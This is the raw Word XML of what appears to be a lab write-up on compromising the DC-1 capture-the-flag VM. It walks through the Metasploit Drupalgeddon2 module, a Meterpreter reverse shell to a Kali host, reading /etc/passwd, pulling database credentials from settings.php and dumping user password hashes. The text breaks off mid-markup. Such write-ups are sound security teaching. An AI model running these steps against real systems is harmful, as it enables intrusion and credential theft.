      <w:tr w:rsidR="005D2F94" w:rsidRPr="005D2F94" w14:paraId="6F898DE0" w14:textId="77777777" w:rsidTr="005D2F9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BE711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C548A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What It Is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F20D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Real-World Analogy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D2F94" w:rsidRPr="005D2F94" w14:paraId="02B92EDC" w14:textId="77777777" w:rsidTr="005D2F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4B5B7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PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>CMS</w:t>
            </w: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 (Content Management System)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BD591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Software that manages website content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FC55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Like </w:t>
            </w:r>
            <w:r w:rsidRPr="005D2F9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PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>WordPress, Drupal, Joomla</w:t>
            </w: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 — pre-built house designs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D2F94" w:rsidRPr="005D2F94" w14:paraId="01F8C159" w14:textId="77777777" w:rsidTr="005D2F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769A5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PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>Framework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8980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Coding structure the website is built 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3EAEF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Like </w:t>
            </w:r>
            <w:r w:rsidRPr="005D2F9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PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>Laravel, Django, React</w:t>
            </w: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 — the blueprint of the house</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D2F94" w:rsidRPr="005D2F94" w14:paraId="4CEC55A1" w14:textId="77777777" w:rsidTr="005D2F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23BC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PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>Server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DCA2E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Computer software that delivers the website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1F9E2" w14:textId="77777777" w:rsidR="005D2F94" w:rsidRPr="005D2F94" w:rsidRDefault="005D2F94" w:rsidP="005D2F94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Like </w:t>
            </w:r>
            <w:r w:rsidRPr="005D2F94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val="en-PK" w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>Apache, Nginx, IIS</w:t>
            </w:r>
            <w:r w:rsidRPr="005D2F94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 — the delivery truck</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="313236BB" w14:textId="77777777" w:rsidR="005D2F94" w:rsidRDefault="005D2F94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0C1C48C6" w14:textId="6F100215" w:rsidR="003E0A79" w:rsidRDefault="003E0A79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542CD4BE" w14:textId="56EA5344" w:rsidR="003E0A79" w:rsidRDefault="003E0A79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41BAE484" w14:textId="4D7EB1FE" w:rsidR="005D2F94" w:rsidRDefault="005D2F94" w:rsidP="005D2F9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Attempt exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107F46B3" w14:textId="7DC80A4E" w:rsidR="005D2F94" w:rsidRDefault="005D2F94" w:rsidP="005D2F9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in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9DD0BE" w14:textId="726FFE61" w:rsidR="005D2F94" w:rsidRDefault="005D2F94" w:rsidP="005D2F94">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00413CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00413CC2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Opens the </w:t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Metasploit Framework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 — a hacking tool with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en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                 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hundreds of pre-made exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005DF35A" w14:textId="69C20288" w:rsidR="005D2F94" w:rsidRPr="00413CC2" w:rsidRDefault="005D2F94" w:rsidP="005D2F94">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00413CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00413CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00413CC2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Searches for </w:t>
      </w:r>
      <w:r w:rsidRPr="00413CC2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>all exploits, scanners, and payloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00413CC2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00413CC2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related to Drupal CMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76893429" w14:textId="463C3418" w:rsidR="003E0A79" w:rsidRPr="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E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en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00413CC2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finds all pre-made attacks for Drupal websites — so you can exploit them without coding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BB3C9" w14:textId="1C63326A" w:rsidR="003E0A79" w:rsidRDefault="003E0A79" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2491BB0A" w14:textId="05C140C2" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0A2E24" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="00413CC2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393FCB5D" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="00413CC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13CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00413CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00413CC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/webapp/drupal_drupalgeddon</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00413CC2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 w:rsidRPr="00413CC2">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t>Loads a specific exploit into Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
        </w:rPr>
        <w:t> so you can configure and run it against your target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F698D6B" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="00413CC2">
      <w:pPr>
        <w:spacing w:before="480" w:after="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="5D5FA4BD">
          <v:rect id="_x0000_i1025" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#0f1115" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F632B84" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="00413CC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Breaking It Down</w:t>
      </w:r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005"/>
      </w:tblGrid>
      <w:tr w:rsidR="00413CC2" w14:paraId="07ADF0D0" w14:textId="77777777" w:rsidTr="00413C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96B80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F3C8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</w:tr>
      <w:tr w:rsidR="00413CC2" w14:paraId="794DD4FA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1509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FB9F4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 Metasploit: "I want to work with this module"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w14:paraId="30CB6B8A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06718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exploit/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FC953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of module (attack code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w14:paraId="0BC993D2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66AD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unix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4B0A5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operating system (Linux/Unix)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w14:paraId="3FB419E6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885A7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webapp/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C3182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of vulnerability (web application)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w14:paraId="47D407D5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265F1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drupal_drupalgeddon2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DC324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 of the specific exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0798E915" w14:textId="0C8EEB0B" w:rsidR="00413CC2" w:rsidRPr="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="00413CC2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00790EE9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61DBB672" wp14:editId="3069EE4D">
            <wp:extent cx="5731510" cy="19907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08F3" w14:textId="6AE7D6E3" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E0A7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Notice the prompt changed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> — you are now "inside" the exploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2BB747" w14:textId="3C2F2673" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E2DE25" w14:textId="55711F83" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD2B7FC" w14:textId="01E91EC2" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B17F251" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9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RHOSTS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192.168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.32.133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B7C5C5" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9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RPORT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80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352B072F" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9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LHOST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192.168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.32.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBF7023" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9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LPORT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4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674DB4A4" w14:textId="213DD54B" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C2C6B45" w14:textId="2F1C2BC8" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0142C1B8" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="00413CC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Breaking Down Each Setting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349"/>
        <w:gridCol w:w="1349"/>
        <w:gridCol w:w="2020"/>
        <w:gridCol w:w="1495"/>
        <w:gridCol w:w="1479"/>
      </w:tblGrid>
      <w:tr w:rsidR="00413CC2" w14:paraId="35001192" w14:textId="77777777" w:rsidTr="00413C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6005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Command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9827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EA9B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Your Value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01F5E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Why It's Set</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w14:paraId="56D024B2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EDF43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set RHOSTS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7E348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Remote Host</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t> (target)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281C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192.168.32.133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83D5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"Attack this IP address"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w14:paraId="160ACB2E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A1DA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set RPORT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CBDD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Remote Port</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t> (target)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A271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80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BBFF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"Target website is on port 80 (HTTP)"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w14:paraId="1141A442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15743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set LHOST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D7DFC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Local Host</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t> (your machine)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DB74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192.168.32.132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BFBE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"Send the shell back to this IP"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w14:paraId="5C163396" w14:textId="77777777" w:rsidTr="00413C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72F5A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set LPORT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4C17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Local Port</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
              </w:rPr>
              <w:t> (your machine)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D144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4444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FFF68" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRDefault="00413C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"Send the shell back to this port"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w:rsidRPr="00413CC2" w14:paraId="4CDB7668" w14:textId="77777777" w:rsidTr="00413CC2">
        <w:trPr>
          <w:gridAfter w:val="1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FE9EB" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="00413C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413C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RHOSTS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E51E" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="00413C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413CC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Where to send the </w:t>
            </w:r>
            <w:r w:rsidRPr="00413C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exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w:rsidRPr="00413CC2" w14:paraId="69F0BFFA" w14:textId="77777777" w:rsidTr="00413CC2">
        <w:trPr>
          <w:gridAfter w:val="1"/>
        </w:trPr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4AB3" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="00413C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413C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LHOST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837B" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="00413C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413CC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Where the target should send the </w:t>
            </w:r>
            <w:r w:rsidRPr="00413C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reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5401BFCC" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="00413C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13CC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80E6546">
          <v:rect id="_x0000_i1027" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#0f1115" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="166E222B" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9" w:rsidRDefault="00413CC2" w:rsidP="00413CC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</w:pPr>
      <w:r w:rsidRPr="00790EE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  <w:t>: Explain exploit, payload, reverse shell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309"/>
        <w:gridCol w:w="6618"/>
      </w:tblGrid>
      <w:tr w:rsidR="00413CC2" w:rsidRPr="00790EE9" w14:paraId="2B820199" w14:textId="77777777" w:rsidTr="00A13D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97AD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8956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78A4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My Lab Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w:rsidRPr="00790EE9" w14:paraId="0E7DE03D" w14:textId="77777777" w:rsidTr="00A13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41224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B477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Code that takes advantage of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FF45A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Drupalgeddon2 module (</w:t>
            </w:r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exploit/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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unix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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/webapp/drupal_drupalgeddon2</w:t>
            </w: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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w:rsidRPr="00790EE9" w14:paraId="7C13AD06" w14:textId="77777777" w:rsidTr="00A13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38D7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137D2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Code that executes after successful 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7311A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php/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413CC2" w:rsidRPr="00790EE9" w14:paraId="0E314371" w14:textId="77777777" w:rsidTr="00A13D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1C5AE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PK"/>
              </w:rPr>
              <w:t>Reverse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597D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Target initiates connection back to attacker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AC982" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9" w:rsidRDefault="00413CC2" w:rsidP="00A13D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Meterpreter session from DC-1 to Kali (</w:t>
            </w:r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n-PK"/>
              </w:rPr>
              <w:t>192.168.32.133:51675 → 192.168.32.132:4444</w:t>
            </w:r>
            <w:r w:rsidRPr="00790EE9">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:eastAsia="en-PK"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12F4F6E8" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9" w:rsidRDefault="00413CC2" w:rsidP="00413C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790EE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PK"/>
        </w:rPr>
        <w:t>How it worked:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB0E63D" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9" w:rsidRDefault="00413CC2" w:rsidP="00413CC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  <w:t>Exploit triggered RCE in Drupal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7DA8B2" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9" w:rsidRDefault="00413CC2" w:rsidP="00413CC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  <w:t>Payload was delivered to DC-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BD9C24" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9" w:rsidRDefault="00413CC2" w:rsidP="00413CC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  <w:t>Payload executed and established reverse connection to Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1BE4FF" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9" w:rsidRDefault="00413CC2" w:rsidP="00413CC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eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Meterpreter session gave me remote control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C858D8" w14:textId="676206E2" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36AEEAF6" w14:textId="6F78B78E" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0526BAC6" w14:textId="2E5A5D2D" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E0A79">
      <w:pPr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-- POST-EXPLOITATION THINKING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB553D9" w14:textId="58E5C783" w:rsidR="00413CC2" w:rsidRPr="00413CC2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/etc/passwd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|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grep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-v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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05D8AB07" w14:textId="0223CDED" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E0A7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Shows all users on the system who can actually log in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> (excludes system/service accounts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D55A2B" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9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-name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"flag*.txt"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E45649"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>2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&gt;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/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329FAEB4" w14:textId="2929DEAD" w:rsidR="00413CC2" w:rsidRDefault="00413CC2" w:rsidP="003E0A7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Searches the entire filesystem for any file named starting with "flag" and ending with ".txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1632AFF1" w14:textId="77777777" w:rsidR="00413CC2" w:rsidRPr="00790EE9" w:rsidRDefault="00413CC2" w:rsidP="00413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/var/www/flag1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46506B57" w14:textId="78F5FA3E" w:rsidR="00413CC2" w:rsidRDefault="00501341" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EBEEF2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Displays the contents of the flag file located at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/var/www/flag1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B77CBBA" w14:textId="77777777" w:rsidR="00501341" w:rsidRPr="00790EE9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/home/flag4/flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8E26EB" w14:textId="01F54176" w:rsidR="00501341" w:rsidRDefault="00501341" w:rsidP="003E0A79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rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Displays the contents of flag 4 located in the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flag4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> user's home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580A76A8" w14:textId="77777777" w:rsid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/var/www/sites/default/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settings.php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|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grep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-A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eastAsia="en-PK"/>
        </w:rPr>
        <w:t>10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"databases"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A0307B" w14:textId="31EA2F67" w:rsidR="00501341" w:rsidRP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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501341">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Find Database Credentials</w:t>
      </w:r>
      <w:r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Drupal stores database passwords in this file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DD0198" w14:textId="75D7EDA8" w:rsidR="00501341" w:rsidRPr="00501341" w:rsidRDefault="00501341" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3F71C0" w14:textId="77777777" w:rsid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</w:pP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mysql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-u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dbuser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-pR0ck3t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-e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 xml:space="preserve">"SELECT name, pass FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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drupaldb.users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00790EE9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="50A14F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>;"</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F9ABE80" w14:textId="4C1BC11D" w:rsidR="00501341" w:rsidRP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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501341">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Extract User Hashes from Database</w:t>
      </w:r>
      <w:r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Steals password hashes to crack later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C54003" w14:textId="217EA999" w:rsidR="00501341" w:rsidRDefault="00501341" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133D0E87" w14:textId="28631082" w:rsidR="00501341" w:rsidRDefault="00501341" w:rsidP="003E0A79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA773BF" w14:textId="77777777" w:rsidR="00501341" w:rsidRDefault="00501341" w:rsidP="00501341">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="4078F2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00790EE9">
        <w:rPr>
          <w:rStyle w:val="token"/>
